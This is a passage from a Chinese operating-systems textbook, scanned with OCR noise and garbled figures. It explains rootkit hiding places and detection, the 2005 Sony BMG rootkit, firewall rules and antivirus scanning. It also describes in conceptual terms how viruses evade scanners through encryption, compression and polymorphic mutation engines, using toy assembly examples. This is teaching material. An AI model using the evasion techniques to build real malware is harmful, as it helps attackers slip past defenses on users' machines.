了 机 会 去 检查 系统 调用 的 参数 和 返回 值 ， 并 根据 自身 隐藏 的 需要 更 改 这 些 参数 和 返回 值 。 

5) 应 用 程序 rootkit。 另 一 个 隐藏 rootkit 的 地 方 是 在 大 的 应 用 程序 中 ， 尤 其 是 那些 在 运行 时 会 创建 很 多 新 
文件 的 应 用 程序 中 (如 用 户 分 布 图 、 图 像 预 览 等 )。 这 些 新 文件 是 隐藏 rootkit 的 好 地 方 ， 没 有 人 会 怀疑 其 存在 。 

这 五 种 rootkit 可 以 隐藏 的 位 置 由 图 9-31 所 示 。 
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图 9-31 rootkit 可 以 隐藏 的 五 种 位 置 


2. rootkit 检 测 

当 硬 件 、 操 作 系统 、 库 和 应 用 程序 不 能 被 信任 时 ，rootkit 很 难 被 检测 到 。 例 如 ， 一 种 查找 rootkit 的 
明显 方法 是 列举 磁盘 上 的 所 有 文件 ， 但 是 读 取 目录 的 系统 调用 、 调 用 系统 调用 的 库 函 数 以 及 列表 程序 都 
有 潜在 的 恶意 性 ， 并 有 可 能 忽略 掉 与 rootkit 相 关 的 文件 。 然 而 情况 也 绝 非 无 可 救 药 。 

检测 一 个 引导 自己 的 管理 程序 并 在 其 控制 下 的 虚拟 机 中 运行 操作 系统 和 应 用 程序 的 rootkit 虽 然 难以 
处 理 但 也 并 非 不 可 能 。 这 要 求 从 性 能 和 功能 上 仔细 检查 虚拟 机 和 实际 机 器 的 细微 差异 。Garfinkel 等 
(2007) 已 经 提出 了 一 些 这 样 的 差异 (如 下 所 述 )，Carpenter 等 (2007) 也 讨论 了 这 个 话题 。 

一 类 检测 方法 依赖 于 一 个 事实 : 管理 程序 自身 使 用 物理 资源 而 失去 这 些 资 源 可 以 被 检测 到 。 例 如 ， 
管理 程序 需要 使 用 一 些 TLB 入 口 ， 在 这 些 稀缺 资源 的 使 用 上 与 虚拟 机 产生 竞争 。rootkit 检 测 程序 可 以 向 
TLB 施 加 压力 ， 观 察 其 性 能 并 与 此 前 在 裸 机 上 测量 的 性 能 数据 进行 比较 。 

另 一 类 检测 方法 与 计时 相关 ， 尤 其 与 虚拟 输入 输出 设备 的 计时 相关 。 假 设 在 实际 机 器 上 读 出 一 些 PCI 
设备 寄存 器 需要 100 个 时 钟 周期 ， 这 个 时 间 很 容易 重 现 。 在 一 个 虚拟 环境 下 ， 这 个 寄存 器 的 值 来 自 于 内 存 ， 
它 的 读 取 时 间 依 赖 于 它 到 底 在 CPU 一 级 缓存 、 二 级 缓存 还 是 实际 RAM 中 。 检 测 程序 可 以 轻易 地 强迫 其 在 这 
些 状态 之 间 来 回 移动 并 测量 实际 读 取 时 间 的 变化 。 注 意 我 们 关注 的 是 读 取 时 间 的 变化 而 非 实际 的 读 取 时 间 。 

另 一 个 可 以 被 探查 的 部 分 是 执行 特权 指令 的 时 间 ， 尤 其 是 对 那些 在 实际 硬件 上 只 需要 几 个 时 钟 周期 
而 在 被 模拟 时 需要 几 百 或 几 千 个 时 钟 周 期 的 特权 指令 。 例 如 ， 如 果 读 出 某 个 被 保护 的 CPU 寄存 器 在 实际 
硬件 环境 下 需要 1 纳 秒 ， 那 么 10 亿 次 软 中 断 和 模拟 绝 不 可 能 在 1 秒 内 完成 。 当 然 ， 管 理 程 序 可 以 欺骗 报告 
模拟 时 间 而 不 报告 所 有 涉及 时 间 的 系统 调用 的 实际 时 间 ， 检 测 程序 可 以 通过 连接 提供 精确 时 间 基 准 的 远 
程 主机 或 网 站 来 绕 过 时 间 模 拟 。 因 为 检测 程序 只 需要 测量 时 间 间 隔 (例如 ， 执 行 10 亿 次 被 保护 寄存 器 的 
读 操作 需要 多 少时 间 ) ， 本 地 时 钟 和 远程 时 钟 的 偏 移 没有 关系 。 

如 果 没 有 管理 程序 被 塞 人 硬件 和 操作 系统 之 间 ， 那 么 rootkit 可 能 被 隐藏 在 操作 系统 中 。 很 难 通过 引 
导 计算 机 来 检测 其 存在 ， 因 为 操作 系统 是 不 可 信 的 。 例 如 ，rootkit 可 能 安装 大 量 的 文件 ， 这 些 文件 的 文 
件 名 都 由 “$$$_” 起 始 ， 当 读 取 代表 用 户 程序 的 目录 时 ， 不 报告 这 些 文件 的 存在 。 

在 这 样 的 环境 下 检测 rootkit 的 一 个 方法 是 从 一 个 可 信 的 外 部 介质 (如 CD-ROM/DVD 或 USB 棒 ) 引 
导 计 算 机 ， 然 后 磁盘 可 以 被 一 个 反 rootkit 程 序 扫描 ， 这 时 不 用 担心 rootkit 会 干扰 这 个 扫描 。 另 一 个 选择 
是 对 操作 系统 中 的 每 个 文件 做 密码 散 列 ， 这 些 散 列 值 可 以 与 一 个 列表 中 的 散 列 值 进行 比较 ， 这 个 列表 在 
系统 安装 的 时 候 生 成 并 存储 于 系统 外 的 一 个 不 可 被 算 改 的 位 置 。 如 果 没 有 预先 建立 这 些 散 列 值 ， 也 可 以 
由 安装 CD-ROM 或 DVD 即时 计算 得 到 ， 或 由 被 比较 文件 自身 进行 计算 得 到 。 

库 和 应 用 程序 中 的 rootkit 更 难 隐藏 ， 当 操作 系统 从 一 个 外 部 介质 装 入 并 可 信 时 ， 这 些 库 和 应 用 程序 
的 散 列 值 也 可 以 与 已 知 为 正确 且 存 储 与 CD-ROM 上 的 散 列 值 进行 比较 。 

到 目前 为 止 ,我 们 讨论 的 都 是 被 动 rootkit， 它 们 不 会 干扰 检测 软件 。 还 存在 一 些 主动 rootkit， 它 们 
查找 并 破坏 检测 软件 或 至 少将 检测 软件 更 改 为 永远 报告 “NO ROOTKITS FOUND!”( 没 有 发 现 rootkit)， 
这 些 rootkit 要 求 更 复杂 的 检测 方法 。 幸 运 的 是 ， 到 目前 为 止 在 现实 环境 下 主动 rootkit 还 没有 出 现 。 

在 发 现 rootkit 后 应 该 做 什么 这 个 问题 上 存在 两 种 观点 。 一 种 观点 认为 系统 管理 员 应 该 像 处 理 癌症 的 
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外 科 医 生 那 样 非常 小 心地 切除 它 。 另 一 种 观点 认为 尝试 移 除 rootkit 太 过 危险 ， 可 能 还 有 其 他 碎片 隐藏 在 
其 他 地 方 ， 在 这 一 观点 下 ,唯一 的 解决 办 法 是 回复 到 上 一 个 已 知 干净 的 完整 备份 。 如 果 没 有 可 用 的 备份 ， 
就 要 求 从 原始 CD-ROM/DVD 进 行 新 的 安装 。 

3. Sony rootKit 

在 2005 年 ，Sony BMG 公司 发 行 了 一 些 包 含 rootkit 的 音乐 CD。 这 被 Mark Russinovich (Windows 管 
理工 具 网 站 www.sysinternals.com 的 共同 创始 人 之 一 ) 发 现 ， 那 时 他 正在 开发 一 个 rootkit 检 测 工具 并 惊奇 
地 在 自己 的 系统 中 找到 了 一 个 rootkit。 他 在 自己 的 blog 中 写 下 了 这 件 事 ， 这 很 快 传 遍 了 各 大 媒体 和 互联 
网 。 一 些 科技 论文 与 此 相关 (Arnab 和 Hutchison, 2006; Bishop 和 Frincke, 2006; Felten 和 Halderman, 2006; 
Halderman 和 Felten, 2006;Levine et al.,2006) 。 这 件 事 导致 的 龙 动 直到 好 几 年 以 后 才 逐 渐 停止 。 以 下 我 们 
对 此 事件 做 简单 的 描述 。 

当 用 户 插入 CD 到 一 个 Windows 系 统计 算 机 的 驱动 器 中 时 ，Windows 查 找 一 个 名 为 autorun.inf 的 文件 ， 
其 中 包含 了 一 系列 要 执行 的 动作 ， 通 常 包括 打开 一 些 CD 上 的 程序 (如 安装 向 导 )。 正 常情 况 下 ， 音 乐 
CD 没有 这 些 文件 因为 即便 它们 存在 也 会 被 单机 CD 播放 器 忽略 。 显 然 Sony 的 某 个 天 才 认 为 他 可 以 聪明 地 
通过 放置 一 个 autorun.inf 文 件 在 一 些 CD 上 来 防止 音乐 盗版 。 当 这 些 CD 插 入 计算 机 时 ， 就 会 立即 安静 地 
安装 一 个 12MB 大 小 的 rootkit。 然 后 一 个 许可 协议 被 显示 ， 其 中 没有 提 到 任何 关于 软件 被 安装 的 信息 。 
在 显示 许可 的 同时 ，Sony 的 软件 检查 是 否 有 200 种 已 知 的 复制 软件 中 的 任 一 种 正在 运行 ， 如 果 有 的 话 就 
命令 用 户 停止 这 些 复制 软件 。 如 果 用 户 同 意 许可 协议 并 关闭 了 所 有 的 复制 软件 ， 音 乐 将 可 以 播放 ， 否 则 
音乐 就 不 能 播放 。 即 使 用 户 拒绝 协议 ，rootkit 仍 然 被 安装 。 

这 个 rootkit 的 工作 方法 如 下 。 它 向 Windows 内 核 插入 一 系列 文件 名 由 “$sys$” 起 始 的 文件 。 这 些 文 
件 之 一 是 一 个 过 滤器 ， 这 个 过 滤器 截取 所 有 向 CD-ROM 了 驱动 器 的 系统 调用 并 禁止 除 Sony 的 音乐 播放 器 之 
外 的 所 有 程序 读 取 CD。 这 一 动作 使 得 复制 CD 到 硬盘 (这 是 合法 的 ) 变 得 不 可 能 。 另 一 个 过 滤器 截取 所 
有 读 取 文件 、 进 程 和 注册 表 列 表 的 调用 ， 并 删除 所 有 由 “$sys$” 起 始 的 项 (即便 这 些 项 是 由 与 Sony 和 
音乐 都 完全 无 关 的 程序 而 来 的 )， 目 的 是 为 了 掩盖 rootkit。 这 一 方法 对 于 rootkit 设 计 新 手 来 说 非常 标准 。 

在 Russinovich 发 现 这 一 rootkit 之 前 ， 它 已 经 被 广泛 地 安装 ， 这 完全 不 令 人 惊讶 ， 因 为 在 超过 2000 万 
张 CD 上 包含 此 rootkit。Dan Kaminsky (2006) 研究 了 其 广度 并 发 现 全 世界 超过 50 万 个 网 络 中 的 计算 机 
已 经 被 感染 。 

当 消息 传 出 时 ，Sony 的 第 一 回应 是 它 有 权 保 护 其 知识 产权 。 在 National Public Radio 的 一 次 采访 中 ， 
Sony BMG 的 全 球 数字 业务 主席 Thomas Hesse 说 :“ 我 认为 绝 大 多 数 人 甚至 不 知道 什么 是 rootkit， 那 么 他 
们 何必 那么 在 意 它 ?” 当 这 一 回应 激 起 了 公众 怒火 时 ，Sony 让 步 并 发 行 了 一 个 补丁 来 移 除 对 “$sys$” 
文件 的 掩盖 ， 但 仍 保留 rootkit。 随 着 压力 的 增加 ，Sony 最 终 在 其 网 站 上 发 布 了 一 个 印 载 程序 ， 但 作为 获 
得 件 载 程序 的 条 件 ， 用 户 必 须 提供 一 个 E-mail 地 址 并 同意 Sony 可 以 在 以 后 向 他 们 发 送 宣传 材料 (这 些 可 
以 被 大 多 数 人 过 滤 掉 )。 

随 着 故事 的 终结 ， 人 们 发 现 Sony 的 卸载 程序 存在 技术 缺陷 ， 使 得 被 感染 的 计算 机 非常 容易 遭受 互联 
网 上 的 攻击 。 人 们 还 发 现 该 rootkit 包 含 了 从 开源 项 目 而 来 的 代码 ， 这 违反 了 这 些 开源 项 目的 著作 权 (这 
些 开源 项 目的 著作 权 要 求 对 其 软件 的 免费 使 用 也 发 布 源 代码 )。 

除了 空前 的 公众 关系 灾难 之 外 ，Sony 也 面临 着 法 律 危机 。 德 克 萨 斯 州 控告 Sony 违 反 了 其 反 间 谍 软 
件 法 以 及 欺诈 性 贸易 惯例 法 (因为 即使 许可 被 拒绝 rootkit 仍 然 会 被 安装 )。 此 后 在 39 个 州都 提起 了 公诉 。 
在 2006 年 12 月 ， 在 Sony 同 意 支付 425 万 美元 、 同 意 停止 在 其 未 来 的 CD 中 放 入 rootkit 并 授权 每 位 受害 者 可 
以 下 载 一 个 有 限 的 音乐 目录 下 的 三 张 专辑 之 后 ， 这 些 诉讼 得 以 解决 。 在 2007 年 1 月 ，Sony 承 认 其 软件 秘 
密 监视 用 户 的 收听 习惯 并 将 其 报告 回 Sony 也 违反 了 美国 法 律 。 在 与 公平 贸易 委员 会 (FIC) 的 协议 中 ， 
Sony 同 意 支付 那些 计算 机 遭 到 其 软件 破坏 的 用 户 150 美 元 的 补偿 。 

关于 Sony 的 rootkit 的 故事 已 经 为 每 一 位 曾经 认为 rootkit 只 是 学 术 上 的 稀奇 事物 而 与 现实 世界 无 关 的 
读者 提供 了 实例 。 在 互联 网 上 搜索 “Sony rootkit” 会 发 现 大 量 补充 信息 。 


9.10 防御 


面 对 危 机 四 伏 的 状况 ， 那 么 还 有 确保 系统 安全 的 可 能 吗 ? 当然 ， 是 有 的 ， 下 面 的 小 节 要 介绍 一 下 几 
种 设计 和 实现 系统 的 方法 来 提高 它们 的 安全 性 。 一 个 最 重要 的 概念 就 是 全 面 防御 (defense in depth), 
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基本 地 讲 ， 这 个 概念 是 指 你 必须 有 多 层 的 安全 性 ， 以 便于 当 其 中 的 一 层 被 破坏 ， 仍 然 还 有 其 他 层 要 去 防 
御 。 想 象 一 下 这 样 的 一 个 房子 ， 有 一 个 高 的 带 钉 子 的 关闭 着 的 铁 栅栏 ， 在 院子 里 有 运动 检测 器 ， 前 门 上 
有 两 把 做 工 精良 的 锁 ， 屋子 里 还 有 一 个 计算 机 控制 的 盗窃 报警 系统 。 每 一 个 技术 自己 本 身 都 是 有 价值 的 ， 
为 了 问 入 这 个 房子 盗贼 需要 打败 所 有 的 防御 。 一 个 安全 的 计算 机 系统 就 应 该 像 这 个 房子 一 样 ， 有 着 多 层 
的 安全 性 。 我 们 将 要 介绍 其 中 的 某 些 层 次 。 防 御 不 是 真 的 分 等 级 的 ， 而 是 我 们 要 从 一 般 的 外 部 的 东西 开 
始 ， 然 后 逐渐 深入 到 细节 。 


9.10.1 防火 墙 

能 够 把 任何 地 方 的 一 台 计 算 机 连接 到 其 他 一 台 任何 地 方 的 计算 机 上 是 一 件 好 坏 参 半 的 事情 。 网 络 上 
有 很 多 有 价值 的 资料 ， 但 是 同时 连接 到 Internet 上 也 使 我 们 的 计算 机 面临 着 两 种 危险 : 来 自 外 部 和 来 自 内 
部 。 来 自 外 部 的 危险 包括 黑客 、 病 毒 、 间 谍 软 件 以 及 其 他 的 恶意 软件 。 来 自 内 部 的 危险 包括 了 机 密 信息 
泄露 ， 比 如 信用 卡号 、 密 码 、 纳 税 申请 单 和 各 种 各 样 的 公司 信息 。 

因此 ， 我 们 需要 某 种 机 制 来 保证 “好 ”的 留 下 来 并 且 阻 止 “ 坏 ”的 进入 。 一 种 方法 是 使 用 防火 墙 
(firewall) ， 它 是 一 种 中 世纪 古老 的 安全 措施 的 现代 版 本 : 在 你 的 城堡 周围 挖 一 条 护城河 。 这 样 的 设计 强 
制 每 一 个 进入 或 者 离开 城堡 的 人 都 要 经 过 唯一 的 一 座 吊 桥 ，IO 警 察 可 以 在 吊桥 上 检查 每 一 个 经 过 的 人 。 
对 于 网 络 ， 这 种 方法 也 是 可 行 的 : 一 个 公司 可 能 有 很 多 的 任意 连接 的 局 域 网 ， 但 是 所 有 进入 或 离开 公司 
的 网 络 流 都 要 强制 地 通过 一 个 电子 吊桥 一 一 防火 墙 。 

防火 墙 有 两 种 基本 的 类 型 : 硬件 防火 墙 和 软件 防火 墙 。 有 局 域 网 需要 保护 的 公司 通常 选择 硬件 防火 
墙 ， 而 家 庭 的 个 人 用 户 通常 会 选择 软件 防火 墙 。 首 先 ， 让 我 们 看 一 看 硬件 防火 墙 。 一 般 的 硬件 防护 墙 如 
图 9-32 所 示 。 在 该 图 中 ， 来 自 网 络 提供 者 的 连接 (电缆 或 光纤 ) 会 被 插 到 防火 墙 上 ， 防 火 墙 也 连接 到 局 域 
网 上 。 不 经 过 防火 墙 的 允许 任何 包 都 不 能 进入 或 者 离开 局 域 网 。 实 际 的 情况 下 ， 防 护 墙 通常 会 和 路 由 器 、 
网 络 地 址 转换 盒 、 指 令 检查 系统 和 其 他 设备 联合 起 来 工作 ， 但 是 在 这 里 我 们 只 关注 于 防火 墙 自 身 的 功能 。 


207.68.160.190:80 207.68.160.191:25 207.68.160.192:21 
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图 9-32 一 个 由 防火 墙 保护 的 局 域 网 示意 图 ( 含 三 台 主 机 ) 


防火 墙根 据 一 些 规 则 来 配置 ， 这 些 规则 描述 什么 是 允许 的 ， 什 么 是 不 允许 的 。 防 护 墙 的 管理 者 可 以 
修改 这 些 规则 ,通常 修改 是 通过 一 个 Web 界 面 进 行 的 (大 多 数 防火 墙 都 内 置 一 个 小 型 Web 服 务 器 来 实现 它 ) 。 
最 简单 的 一 种 防护 墙 是 无 状态 防护 墙 (stateless firewall) ， 只 会 检查 通过 的 包 的 头 部 ， 然 后 根据 包头 部 的 
信息 和 防火 墙 的 规则 作出 传送 还 是 丢弃 这 个 包 的 决定 。 包 头 部 的 信息 包括 源 和 目的 的 IP 地 址 、 源 和 目的 
的 端口 、 服 务 的 类 型 和 协议 。 包 头 部 的 其 他 属性 也 是 可 以 得 到 的 ， 但 是 很 少 会 被 防火 墙 的 规则 涉及 。 

在 图 9-32 中 ,我们 有 3 个 服务 器 ， 每 一 个 都 有 一 个 唯一 的 IP 地 址 ， 形 如 207.68.160.x， 其 中 x 依次 是 
190、191、192。 这 三 个 地 址 就 是 那些 要 发 送 给 这 些 服务 器 的 包 的 目的 地 址 。 进 来 的 包 同 时 也 包含 一 个 
16 位 的 端口 号 (port number) ， 来 描述 机 器 上 哪 一 个 进程 来 获得 这 个 包 (一 个 进程 能 监听 一 个 来 自 外 部 
网 络 流量 的 端口 ) 。 一 些 端口 是 和 一 些 标准 服务 联系 在 一 起 的 。 特 别 地 ， 端 口 80 被 web 使用， 端口 25 被 
E-mail 使 用 ， 端 口 21 被 FTP (文件 传输 协议 ) 服务 使 用 ， 但 是 大 多 数 其 他 的 端口 是 被 用 户 定义 的 服务 使 
用 的 。 在 这 样 的 条 件 下 ， 防 火 墙 可 能 按照 如 下 规则 配置 : 


207.68.160.190 | 80 | Accept | 
1 








207.68.160.192 
| = 
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这 些 规则 只 有 当 包 被 发 送 到 端口 80 的 时 候 ， 才 会 允许 进入 地 址 是 207.68.160.190 的 机 器 ， 这 个 机 器 
的 其 他 端口 都 是 被 禁止 的 并 且 发 送 给 这 些 端 口 的 包 都 会 被 防火 墙 自动 丢弃 。 同 样 ， 只 有 发 送 给 端口 25 和 
21 的 包 才 可 以 进入 其 他 两 个 机 器 。 所 有 其 他 的 网 络 流 都 是 禁止 的 。 这 个 规则 集 使 得 攻击 者 除了 提供 的 三 
个 公共 的 服务 以 外 ， 很 难 访问 到 局 域 网 。 

虽然 有 了 防火 墙 ， 局 域 网 还 是 可 能 会 受到 攻击 。 例 如 ， 如 果 Web 服 务 器 是 Apache 并 且 攻 击 者 找到 了 
一 个 可 以 利用 的 Apache 的 bug， 那 么 他 可 以 发 送 一 个 很 长 的 URL 和 到 207.68.160.190 的 端口 80， 然 后 制造 一 
个 缓冲 区 溢出 ， 进 而 控制 由 防火 墙 保 护 的 一 台 机 器 ， 通 过 这 个 机 器 可 以 发 动 对 局 域 网 内 其 他 机 器 的 攻击 。 

另 一 种 潜在 的 攻击 是 写 一 个 多 人 游戏 ， 发 布 这 个 游戏 并 且 让 它 得 到 广泛 的 接受 。 这 个 游戏 的 软件 需 
要 某 个 端口 来 和 其 他 的 玩家 联系 ， 所 以 游戏 设计 者 会 选择 一 个 端口 ， 比 如 9876， 并 且 告 诉 玩家 来 改变 防 
火 墙 的 设置 ， 来 允许 在 这 个 端口 网 络 流 的 进出 。 打 开端 口 的 人 现在 也 容易 受到 这 个 端口 上 的 攻击 。 即 使 
这 个 游戏 是 合法 的 ， 那 么 它 也 可 能 包含 一 些 可 以 利用 的 bug。 打 开 越 多 的 端口 ， 被 成 功 攻 击 的 机 会 就 越 
大 。 防 火 墙 上 的 每 一 个 端口 都 增加 了 攻击 通过 的 可 能 。 

除了 无 状态 防火 墙 以 外 ， 还 有 一 种 跟踪 连接 以 及 连接 状况 的 状态 防火 墙 。 这 些 防火 墙 能 够 更 好 地 防 
止 某 些 类 型 的 攻击 ， 特 别 是 那些 和 建立 连接 有 关 的 攻击 。 另 外 ， 一 些 其 他 类 型 的 防火 墙 实 现 了 入 侵 检 测 
系统 (Intrusion Detection System，IDS) ， 利 用 IDS 防 火 墙 不 仅 可 以 检测 包 的 头 部 还 可 以 用 检测 包 的 内 容 
来 查找 可 疑 的 内 容 。 

软件 防火 墙 ， 有 时 也 叫 作 个 人 防火 墙 ， 和 硬件 防火 墙 具 有 同样 的 功能 ， 只 不 过 是 通过 软件 方式 实现 
的 。 它 们 是 附加 在 操作 系统 内 核 的 网 络 代码 上 的 过 滤器 ， 是 和 硬件 防火 墙 工 作 机 制 一 样 的 过 证 数据 包 。 


9.10.2 反 病 毒 和 抑制 反 病毒 技术 

正如 上 文 所 提 到 的 ， 防 火 墙 会 尽量 地 阻止 人 侵 者 进入 电脑 ， 但 是 在 很 多 情况 下 防火 墙 会 失败 。 在 这 
种 情况 下 ， 下 一 道 防线 是 由 反 恶 意 软件 的 程序 (antimalware program) 组 成 的 。 尽 管 这 种 反 恶意 软件 的 
程序 同样 可 以 对 抗 蠕虫 和 间谍 软件 ， 但 是 它们 通常 称 作 反 病毒 程序 (antivirus program) 。 病 毒 尽量 地 隐 
藏 自己 ， 而 用 户 则 是 努力 地 发 现 它 们 ， 这 就 像 是 一 个 猫 捉 老鼠 的 游戏 。 在 这 方面 ， 病 毒 很 像 rootkit， 不 
同 的 地 方 是 病毒 的 制造 者 更 强调 的 是 病毒 的 传播 速度 而 不 是 像 rookit 一 样 注重 于 捉迷藏 。 现 在 ， 让 我 们 
来 看 看 反 病 毒 软件 所 使 用 的 技术 ， 以 及 病毒 的 制造 者 Virgil 是 怎么 应 对 这 些 技术 的 。 

1. 病毒 扫描 器 

显然 ， 一 般 用 户 设 有 去 查找 竭尽 全 力 藏 身 的 大 多 数 病毒 ， 所 以 市 场 上 出 现 了 反 病 毒 软 件 。 下 面 我 们 
将 讨论 一 下 反 病 毒 软件 的 工作 原理 。 反 病毒 软件 公司 拥有 一 流 的 实验 室 ， 在 那里 许多 专家 长 时 间 地 跟踪 
并 研究 不 断 涌 现 出 的 新 病毒 。 第 一 步 是 让 病毒 感染 不 执行 任何 操作 的 程序 ， 这 类 程序 叫 作 诱饵 文件 ， 然 
后 获取 病毒 的 完整 内 容 。 下 一 步 是 列 出 病毒 的 完全 代码 表 把 它 输 入 已 知 病毒 的 数据 库 。 公 司 之 间 为 其 数 
据 库 的 容量 而 竞争 。 发 现 新 的 病毒 就 放 到 数据 库 中 与 体育 竞赛 是 完全 不 同 的 。 

一 旦 反 病 毒 软件 安装 在 用 户 的 计算 机 里 ， 第 一 件 事 就 是 在 硬盘 里 扫描 所 有 可 执行 文件 ， 看 看 是 否 能 
发 现 病毒 库 里 已 知 的 病毒 。 大 多 数 反 病毒 公司 都 建 有 网 站 ， 从 那里 客户 可 以 下 载 新 发 现 病毒 的 特征 码 到 
自己 的 病毒 库 里 。 如 果 用 户 有 10 000 个 文件 ， 而 病毒 库 里 有 10 000 种 病毒 ， 当 然 需 要 一 些 高 效 的 代码 使 
得 程序 得 以 更 快 地 运行 。 

由 于 有 些 已 知 病毒 总 是 在 不 断 发 生 细微 变化 ， 所 以 人 们 需要 一 种 模糊 查询 软件 ， 这 样 即 便 3 个 字 节 
的 改变 也 不 会 让 病毒 逃避 检测 。 但 是 ， 模 糊 查询 不 仅 比 正常 查询 慢 ， 而 且 容 易 导 致 错误 报警 (RM). 7 
年 前 在 巴基斯坦 ， 有 些 合 法 的 文件 恰巧 包含 了 与 病毒 代码 极为 相像 的 字符 ， 结 果 导 致 了 病毒 报警 。 用 户 
这 时 往往 会 看 到 下 面 的 信息 : 

WARNING! File xyz.exe may contain the lahore-9x virus. Delete? 


数据 库 里 的 病毒 越 多 ， 扫 描 标准 越 宽 松 ， 误 报警 的 可 能 性 就 越 大 。 如 果 出 现 了 太 多 的 误 报警 ， 用 户 
会 因为 厌烦 而 放弃 使 用 。 但 是 如 果 病 毒 扫描 器 坚持 严格 匹配 病毒 码 ， 它 就 会 错过 许多 变形 病毒 。 解 决 办 
法 是 要 达到 一 种 微妙 的 启发 式 平衡 ， 完 美的 扫描 软件 应 该 识别 病毒 的 核心 代码 ， 这 些 核心 代码 不 会 轻易 
改变 ， 从 而 能 够 作为 病毒 的 特征 签名 来 查找 。 
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由 于 磁盘 里 的 文件 上 周 被 宣布 无 病毒 感染 后 并 不 意味 着 现在 仍 未 被 感染 ， 所 以 人 们 需要 经 常 使 用 病 
毒 扫 描 。 因 为 扫描 速度 很 慢 ， 所 以 要 保持 效率 就 应 该 仅 对 上 次 扫描 后 被 改动 的 文件 进行 检查 。 但 是 ， 聪 
明 的 病毒 会 把 感染 过 的 文件 日 期 重 置 为 初始 日 期 以 逃避 检验 。 于 是 ， 反 病毒 程序 修改 校 验 文件 所 在 目录 
的 日 期 。 但 是 病毒 接着 又 把 目录 的 日 期 也 改 掉 。 这 就 像 我 们 上 面 所 提 到 的 猫 捉 老鼠 游戏 一 样 。 

反 病 毒 软件 的 另 一 种 方法 是 检测 文件 ， 记 录 和 存放 所 有 文件 的 长 度 。 如 果 一 个 文件 自 上 周 以 来 突然 
增加 了 许多 ， 就 有 可 能 被 感染 ， 如 图 9-33a 所 示 。 但 是 ， 聪 明 的 病毒 可 通过 程序 压缩 原 有 文件 并 将 其 填 
充 到 原 有 长 度 来 逃避 检查 。 要 使 这 种 方法 奏效 ， 病 毒 必须 还 要 包含 压缩 和 解压 缩 过 程 ， 如 图 9-33c 所 示 。 


文件 变 长 





解压 缩 过 程 ss 
late 加 密 过 程 
加 密 程序 


被 压缩 的 可 
执行 程序 





图 9-33 a) 一 段 程序 ，b) 已 感染 的 程序 ，c) 被 压缩 的 已 感染 程序 ，d) 加 密 的 病毒 ，e) 带 有 加 密 压 缩 代码 的 
压缩 病毒 


病毒 还 有 一 种 逃避 检测 办 法 , 那 就 是 让 自己 在 磁盘 里 呈现 出 的 特征 与 病毒 数据 库 里 的 特性 不 尽 相 同 。 
要 达到 这 一 目标 ， 方 法 之 一 是 每 感染 一 个 文件 就 用 不 同 的 密 钥 将 自身 加 密 。 在 复制 新 的 病毒 体 之 前 ， 病 
毒 先 随机 产生 一 个 32 位 的 加 密 密 钥 ， 如 将 当前 时 间 与 内 存 里 诸如 72 008 和 319 992 等 数字 进行 异 或 。 然 后 
将 病毒 代码 与 这 一 密 钥 逐 字 节 地 蜡 或， 加 密 后 的 结果 值 储 存在 被 感染 文件 中 ， 如 图 9-32d 所 示 。 密 钥 也 
同时 存放 在 文件 中 。 从 保密 性 角度 来 说 ， 把 密 钥 放 进 文件 是 不 明智 的 。 这 样 做 的 目的 无 非 是 为 了 对 付 病 
毒 扫描 ， 但 却 不 能 防止 专家 在 反 病 毒 实验 室 里 逆向 破解 出 病毒 代码 。 当 然 ， 病 毒 在 运行 时 必须 首先 对 自 
己 解密 ， 所 以 在 文件 里 也 同时 需要 解密 过 程 。 

上 述 策略 实际 上 并 不 完善 ， 因 为 压缩 、 解 压缩 、 加 密 和 解密 等 过 程 在 复制 每 个 病毒 体 时 都 是 一 样 的 ， 
反 病 毒 软件 可 以 利用 这 一 特征 来 查 杀 病毒 。 把 压缩 、 解 压缩 和 加 密 过 程 隐藏 起 来 较为 容易 :， 只 要 对 它们 
加 密 并 存放 在 病毒 体 里 ， 如 图 9-32e 所 示 。 但 是 ， 解 密 过 程 不 能 被 加 密 ， 它 必须 运行 在 硬件 上 以 便 将 病毒 
体 的 其 余部 分 解密 ， 所 以 必须 用 明文 格式 存放 。 反 病毒 软件 当然 知道 这 些 ， 所 以 它们 专门 搜索 解密 过 程 。 

然而 ，Virgil 喜 欢笑 到 最 后 ， 所 以 他 采用 了 下 面 的 步骤 。 假 设 解密 过 程 需 要 进行 如 下 运算 : 

X=(A+B+C-4) 


在 普通 的 双 地 址 计算 机 上 可 以 运用 汇编 语言 编写 该 运算 ， 如 图 9-34a 所 示 。 第 一 个 地 址 是 源 地 址 ， 
第 二 个 地 址 是 目标 地 址 , 所 以 MOV A，R1 是 把 变量 A4 放 入 寄存 器 R1 中 。 图 9-34b 的 代码 也 是 同样 的 意思 ， 
不 同 之 处 仅仅 在 于 代码 中 插入 了 NOP (无 操作 ) 指令 而 降低 了 效率 。 

现在 整个 编码 工作 还 未 完成 。 为 了 伪装 解密 代码 ， 可 以 用 许多 方法 来 替代 NOP。 例 如 ， 把 0 加 入 寄 
存 器 、 自 身 异 或 、 左 移 0 位 、 跳 转 到 下 一 个 指令 等 ， 所 有 的 都 不 做 任何 操作 。 所 以 ， 图 9-34c 在 功能 上 与 
图 9-34a 是 相同 的 。 当 病毒 复制 自身 时 ， 往 往 采 用 图 9-34c 的 代码 而 不 是 图 9-34a， 这 样 在 日 后 运行 时 还 能 
工作 。 这 种 每 次 复制 时 都 发 生变 异 的 病毒 叫 作 多 形态 病毒 (polymorphic virus), 

现在 假设 在 这 段 代 码 里 不 再 需要 R5 寄 存 器 。 也 就 是 说 ， 图 9-34d 与 图 9-34a 的 功能 一 致 。 最 后 ， 在 许 
多 情况 下 ， 可 以 交换 指令 而 不 会 改变 程序 功能 ， 我 们 用 图 9-34e 作 为 另 一 种 与 图 9-34a 在 逻辑 上 保持 一 致 
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的 代码 段 。 这 种 能 够 交换 机 器 码 指令 而 不 影响 程序 功能 的 代码 叫 作 变异 引擎 (mutation engine) 。 较 复杂 
的 病毒 在 复制 病毒 体 时 ， 可 以 通过 变异 引擎 产生 不 同 的 解密 代码 。 变 异 的 手段 包括 插入 一 些 没 用 而 且 没 
有 危害 的 代码 ， 改 变 代 码 的 顺序 ， 交 换 寄 存 器 ， 把 某 条 指令 用 它 的 等 价 指 令 替换 。 变 异 引 擎 本 身 与 病毒 
体 一 起 也 可 以 通过 加 密 的 方法 隐藏 起 来 。 


MOV A,R1 ` 
ADD B,R1 
ADD C,R1 
SUB #4,R1 


MOV A,R1 
NOP 
ADD B,R1 
NOP 
ADD C,R1 


MOV A,R1 MOV A,R1 
ADD #0,R1 OR R1,R1 
ADD B,R1 ADD B,R1 
OR R1,R1 MOV R1,R5 
ADD C,R1 ADD C,R1 


